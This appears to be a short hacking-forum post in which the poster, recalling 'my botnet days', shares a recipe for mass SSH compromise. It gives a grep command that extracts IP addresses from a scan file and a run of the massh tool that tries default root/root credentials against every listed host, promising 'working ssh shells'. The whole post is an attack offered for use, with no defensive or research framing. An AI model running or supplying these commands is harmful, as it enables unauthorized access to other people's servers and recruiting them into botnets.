OP 03 June, 2022 - 05:45 AM
I used this back in my botnet days, I hope it helps!
Code:
grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' out.txt > out.crack
and now use massh
https://github.com/btx3/massh.git
[code]
./massh.py -u root -p root -i out.crack -t 100 > success.txt
AND BAM
success.txt will have working ssh shells.
Leave a like!